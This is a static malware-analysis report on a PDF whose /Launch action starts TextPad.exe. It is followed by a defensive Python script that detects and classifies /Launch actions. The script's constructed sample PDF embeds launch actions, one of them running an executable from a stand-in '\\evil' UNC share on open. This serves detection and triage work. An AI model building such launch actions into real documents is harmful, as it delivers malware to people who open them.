Malicious PDF — malware analysis report

Static analysis result for SHA-256 670f5630f59a6920…

MALICIOUS

PDF

Size: 3.4 KB
Created: 2008-03-12 20:26:23 +01:00
Authoring application: PDFlib Personalization Server 7.0.2p8 (Linux-x86_64)
MD5: d2cb56832c12b13c88c2c080cbb77b65
SHA-1: 5f40dc9cac00bd8b949d0d8431feaebd0ac60294
SHA-256: 670f5630f59a6920dae7b95a0c866b9972ece2a0f95c7a9a5748ddf17eca47fc
Risk Score: 192

Malware Insights

MITRE ATT&CK
T1204.002 Malicious File T1566.001 Spearphishing Attachment

The PDF contains a /Launch action that attempts to execute 'TextPad.exe' with the parameter 'status.txt' from the directory 'C:/Programme/TextPad'. A /Launch action tells the viewer to start an external program when the action fires, which is why it is a well-known way to run a payload from inside a document that looks like an ordinary file. In this sample the target is a text editor rather than an obviously malicious binary, and the action only does anything if that path exists on the victim's machine and the viewer honours /Launch, so the launch action on its own is a strong indicator rather than proof of a working payload. The ML classifier score and the ClamAV signature match are what push the overall verdict to malicious.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9885

Heuristics 4

  • Launch action critical PDF_LAUNCH
    PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
  • ClamAV: Pdf.Tool.Agent-1388586 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Tool.Agent-1388586
  • /Launch action target: TextPad.exe high PDF_LAUNCH_COMMAND
    PDF /Launch action specifies an executable target with parameters 'status.txt'.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All five URLs below are XMP/RDF namespace identifiers from the document's metadata stream (RDF syntax, XMP Media Management, XMP basic, PDF/A identification, Adobe PDF schema); they are not links the document navigates to.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/
    • http://www.aiim.org/pdfa/ns/id/
    • http://ns.adobe.com/pdf/1.3/
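The summary paragraph and the PDF_LAUNCH / PDF_LAUNCH_COMMAND heuristics above describe what the scanner looked for. The following Python script is an added example, not code from the analysis platform or from the file under analysis: it walks the objects of a PDF, pulls out every /Launch action with its /F target, /D default directory and /P parameters (both the plain /F form and the Windows-specific /Win sub-dictionary), classifies the target as executable, URL or UNC path, and checks whether the document's /OpenAction points at the launch object so that it fires on open. The embedded sample PDF is constructed for the demonstration and only mimics the action the report describes; it is not the analysed file, and the second launch object with a UNC target is an assumed extra case showing the other target kind the heuristic covers.

```python
import re
from typing import Dict, List, Optional

# Constructed sample PDF (not the analysed file). Object 4 carries a /Launch
# action shaped like the one in the report; object 5 is an assumed UNC-path
# launch; object 6 is a /URI action that must NOT be reported as a launch.
SAMPLE_PDF = rb"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
4 0 obj
<< /S /Launch /Win << /F (TextPad.exe) /D (C:/Programme/TextPad) /P (status.txt) >> >>
endobj
5 0 obj
<< /S /Launch /F (\\\\evil\\share\\run.exe) >>
endobj
6 0 obj
<< /S /URI /URI (http://www.w3.org/1999/02/22-rdf-syntax-ns#) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
"""

# A PDF literal string: "(" ... ")" where backslash escapes the next byte.
# Nested unescaped parentheses and hex strings <...> are not handled here.
_STR = rb"\(((?:\\.|[^\\)])*)\)"

# Extensions that make a /Launch target worth flagging as an executable.
EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs",
            ".js", ".ps1", ".hta", ".msi", ".dll")


def _unescape(raw: bytes) -> str:
    """Resolve the \\( \\) \\\\ escapes of a PDF literal string."""
    return re.sub(rb"\\([()\\])", rb"\1", raw).decode("latin-1")


def _lookup(body: bytes, key: bytes) -> Optional[str]:
    """Return the literal-string value of /key in an object body, if present.

    The negative lookahead keeps /F from matching /First, /P from /Parent, etc.
    """
    m = re.search(rb"/" + key + rb"(?![A-Za-z])\s*" + _STR, body)
    return _unescape(m.group(1)) if m else None


def classify_target(target: str) -> str:
    """Bucket a launch target the way the PDF_LAUNCH heuristic describes."""
    t = target.strip().lower()
    if t.startswith("\\\\") or t.startswith("//"):
        return "unc"
    if re.match(r"^[a-z][a-z0-9+.-]*://", t):
        return "url"
    if t.endswith(EXEC_EXT):
        return "executable"
    return "other"


def find_launch_actions(pdf: bytes) -> List[Dict]:
    """Scan every 'N G obj ... endobj' body for /S /Launch and describe it."""
    # Only the indirect-reference form of /OpenAction is resolved here;
    # an inline /OpenAction << ... >> dictionary would need a second pass.
    open_action = re.search(rb"/OpenAction\s+(\d+)\s+\d+\s+R", pdf)
    auto_obj = int(open_action.group(1)) if open_action else None

    findings = []
    for m in re.finditer(rb"(\d+)\s+\d+\s+obj\b(.*?)endobj", pdf, re.S):
        num, body = int(m.group(1)), m.group(2)
        if not re.search(rb"/S(?![A-Za-z])\s*/Launch(?![A-Za-z])", body):
            continue
        target = _lookup(body, b"F")          # found in /Win << >> or top level
        findings.append({
            "object": num,
            "target": target,
            "directory": _lookup(body, b"D"),  # /Win default directory
            "parameters": _lookup(body, b"P"), # /Win command-line parameters
            "kind": classify_target(target) if target else "unknown",
            "windows_specific": b"/Win" in body,
            "fires_on_open": num == auto_obj,
        })
    return findings


if __name__ == "__main__":
    for f in find_launch_actions(SAMPLE_PDF):
        print(f)
```

Run it as-is to see both launch objects reported; point `find_launch_actions` at the bytes of a real file to triage it. A `fires_on_open` hit is the case to prioritise, because the action needs no click beyond opening the document. Object streams (compressed objects) and hex-encoded strings are not handled, so a negative result from this script does not clear a file; it is a first-pass triage, not a replacement for a full PDF parser.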